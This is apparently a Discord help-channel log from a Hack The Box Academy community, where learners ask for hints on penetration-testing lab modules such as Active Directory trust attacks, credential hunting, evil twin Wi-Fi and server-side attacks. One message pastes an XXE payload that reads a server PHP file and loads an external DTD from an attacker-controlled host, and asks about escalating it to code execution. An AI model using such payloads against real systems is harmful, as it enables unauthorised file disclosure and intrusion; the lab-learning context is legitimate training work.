Tried this multiple times and the .bat file isnโ€™t created in the Temp\2\ directory. Procmon shows a bat file is made in some \Temp\6BAC.tmp\ directory (always some 4 character string followed by .tmp), but the directory doesnโ€™t exist when I try to navigate to it.

I know this module is a pain for everyone, but I canโ€™t even get past step one. Any insight is greatly appreciated ๐Ÿ™

brave field
half geyser
grand veldt
#

can anybody help me with that i tried every open port (8080,80, 20,22 ,2020) but every time it gave same problem

half geyser
#

I do however need help with** Credential Hunting in Network Shares**. Is the answer even in the Snaffler output? I found a few passwords, but none of them are the answer...

earnest pasture
grand veldt
#

thanks bro it actually worked

half geyser
#

I thought it may be a trick question and even tried things like $password ๐Ÿ˜„

earnest pasture
half geyser
#

I will try that thanks ๐Ÿ™‚ Problem is that the Windows machines seem to be crazy unreliable... It took me 4 hours just to get the output from Snaffler, so really don't feel like connecting to that machine any time soon

mint lodge
#

Hey all,
I am on the Footprinting module (Oracle TNS).
Do I need to install Python 3.11 to use odat.py? Following the instructions did not work.

cosmic sentinel
quiet sun
#

Hi guysโ€ฆ question on the network enumeration with nmap moduleโ€ฆ The last task (firewall and IDS/IPS Evasion-Hard) , Iโ€™m to identify the version of the service and submit the flag as an answer, Iโ€™ve identified two TCP services and a UDP service but their versions arenโ€™t in a flag format. Can anyone help? what am I doing wrong?

mint lodge
olive jackal
quiet sun
olive jackal
#

and with which source port?

brave field
#

@mint lodge try this method

quiet sun
versed swan
#

#cwes #xxe task Advanced file disclosure
can I get RCE, if I modify this payload? or it is just only read files?
<!DOCTYPE email [
<!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->
<!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php"> <!-- reference external file -->
<!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->
<!ENTITY % xxe SYSTEM "http://MY_IP/xxe.dtd"> <!-- reference our external DTD -->
%xxe;
]>
...<email>&joined;</email> <!-- reference the &joined; entity to print the file content -->

#

in task I should read /flag.php.
but in real world how can I know what should I find

brazen marlin
fervent ether
#

AD Trusts - Extrasids Chapter

Perform the "Extrasids" attack to compromise DC01. What is the value of the flag file at at "C:\Users\Administrator\Desktop\flag.txt" in DC01?

Anyone got a workaround for when ive forged the golden ticket but am getting

At line:1 char:1```
half geyser
brazen marlin
brazen marlin
#

In the Pass-The-Ticket (Windows) section of the Password Attacks module, it seems like the credentials aren't working, can anyone double check? i can't RDP from my machine (vpn) or from the pwnbox.

#

I also tried it with Evil-WinRM and i get the error code :WinRMAuthorizationError

earnest pasture
brazen marlin
brazen marlin
earnest pasture
iron yarrow
#

How can I answer the questions in the macOS module?

Find the numeric version running on your machine and submit it as the answer.

quiet sun
brazen marlin
#

30 minutes connecting, 10 minutes hacking

cosmic sentinel
leaden island
#

yo guys, im stuck on mass IDOR enumeration -> web attacks

leaden island
#

did i, or i might DMed the wrong person

#

ah yes its u

brazen marlin
mint lodge
sudden sable
#

hello, i have a problem with the Server-side Attacks module during the Skill Assessment.
for example, i can send an API POST request with burpsuite (to get the location of a food truck, e.g. api=http://truckapi.htb/?id%3DFusionExpress01), but I always get a 200 OK response โ€” in this case, however, without the truckโ€™s location. it doesnโ€™t matter what API request i send; i always receive a 200 OK. obviously, Iโ€™m doing something wrong (maybe in the API POST request), and I was hoping someone could give me a small nudge in the right direction. :)....Thanks in advance!

vestal jasper
#

you can dm me if u still need

blissful agate
#

Has anyone done the Wi-Fi Evil Twin Attacks, DNS Spoofing (Attack) exercises? I followed the walkthrough, and the victim connects to my wifipumpkin3 rogue ap, but they never try connecting facebook.com or academy.hackthebox.com.

edit: I could never get wifipumpkin to work. I had to manually host a rogue ap with hostapd. I used dnsmasq to spoof dns.

mint lodge
#

I am still facing an error in the Footprinting module (Oracle TNS), despite following the message I am pinning.

This command returned me an error, so I'm assuming it's because of that:

sudo apt-get install libaio1 python3-dev alien -y

[sudo] password for kali: 
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Package libaio1 is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source

E: Package 'libaio1' has no installation candidate

Any idea what should I do?

primal eagle
mint lodge
primal eagle
#

Insgall the libaio that is available on your OS, and then create a symlink to it with the name libaio1t64

mint lodge
#

I got it to work eventually. Thanks for the help. I have an ARM Kali machine, so I am having trouble with tools sometimes.

silk ore
#

Hey, so I keep running into this annoying issue when I try to RDP into a machine. First, it makes me wait around for a couple of minutes before it even tries to connect. Then, when it finally does connect from my Pwnbox, I just get a black screen half the time. It works sometimes, but mostly it's just this frustrating combo of waiting and then nothing. Any idea what's going on?

from my vm it works better but because it disconnect every few seconds and then I need to wait for the session to over... I want to altrenate between pwnbox and my vm

fathom pendant
brazen marlin
fathom pendant
#

(this is because they use the same vpn config and cause IP conflicts)

brazen marlin
fathom pendant
#

not the private one

brazen marlin
#

yes ofcourse

#

i was just experimenting after seeing they had the same ip

grave marsh
#

hi guys can someone help i am stuck on Footprinting > SMB

I have got all the flags except the โ€œWhat is the full system path of that specific share? (format: โ€œ/directory/namesโ€

the share is sambashre but i cannot find a path to save my life

the only thing i can find is a windows path C:\home\sambauser

can someone help (idm if itโ€™s in DMs)

#

dw i got the answer

#

and it pmo ๐Ÿคฆ

silent sleet
#

Hello, I'm pretty stuck on CWEE - Injection Attacks Skill Assessment - https://academy.hackthebox.com/module/204/section/2235

I would say I am 80% done with it, I was able to discover the vulnerable parameter, generate the PDF and using HTML Injection able to exfiltrate information from the file system. I even found the internal API I am supposed to mess with, and that is where I am stuck. I am aware it's an XPath Injection, and I even found the i***x file and have the source code of the page, but still I am not able to either properly escape out of the syntax and exfiltrate whatever the flag is supposed to be. Any help would be appreciated. (I prefer dms)

If I revealed too much, I can delete my message, just @ me.

silent sleet
#

pain and suffering

inner canyon
#

Hi. I need help with Using CrackMapExec Skill Assessment, I'm stuck at the third question, after obtained j***s credentials, the one about DEV01. Can anyone give me a nudge?

half geyser
half geyser
#

Spent hours with support trying to convince them that the error is not my location/network/vpn if I cannot connect ping the VM from the pwnbox

#

Just keep rebooting the vm till you get one that works. Or wait...

inner canyon
jolly raptor
#

anyone got problems accessing TheHive on CDSA course?

#

connected via VPN, can ping IP but can't access the site

ocean night
jolly raptor
#

i'll give it a couple mins

ocean night
silent sleet
silent sleet
#

1 word... AIDS

trim frost
#

hey I have a stupid question... if you have 0 interest in certs, any benefit to getting the yearly plan? It sounds like you won't get cubes, but will have access to the modules without spending cubes?

ocean night
# trim frost hey I have a stupid question... if you have 0 interest in certs, any benefit to ...

The yearly plan grants you access to the relevant modules up to a certain tier based upon the subscription level, and once you complete those you (IIRC) retain access to those modules, even after your subscription expires. You don't get cubes, no.. but you get the freedom to access as much content as you wish, up to the tier limit of the subscription.

https://help.hackthebox.com/en/articles/5720974-academy-subscriptions

lean radish
#

Hello, does anyone know how to solve this problem in the AI Red Teamer course? I am doing the Applications of AI in InfoSec module. For the network anomaly exercise, when I upload the model, it shows 0%, but locally I have 90%.

slim coyote
#

can I get a nudge for the LLM output attacks skill assessment

#

i made it to the admin chat but now im stuck lol

#

currently at this stage of hacking

storm elk
#

you can dm me what you tried

amber rose
#

man how do i make the ping even higher

ocean night
amber rose
#

tcp is very slow for me

#

sometimes it just fails mid session

#

no worries i use vpn but still for rdp connections i need pwnbox

ocean night
#

Ok, well support is available if you want to speak to anyone about this. A full 10000ms ping on all servers is very odd

compact patrolBOT
amber rose
digital pendant
#

You also get cubes for completing so in essence with gold you could complete all three hard paths and have 3-4k cubes at the end

#

To spend on tier 4

loud nova
ocean night
ocean night
#

<@&861185840277487616>

Do not share content like that for modules above Tier 0.. please ask for more general advice

#

People are willing to help in DM usually

ashen prawn
#

ops my bad, forgot it was a tier 1 module

slate zinc
#

np just be careful from now on :)

ashen prawn
#

who should I DM?

fathom pendant
slate zinc
#

you ask here and wait for people to reply then

ashen prawn
fathom pendant
#

I suggest following the terminal example from the sample code

#

As to at least the format of how to get the desired result hint ||echo||

ashen prawn
ashen prawn
slate zinc
#

ye you ask that hey i am stuck at xyz module in abc section

fathom pendant
fathom pendant
ashen prawn
ashen prawn
fathom pendant
ashen prawn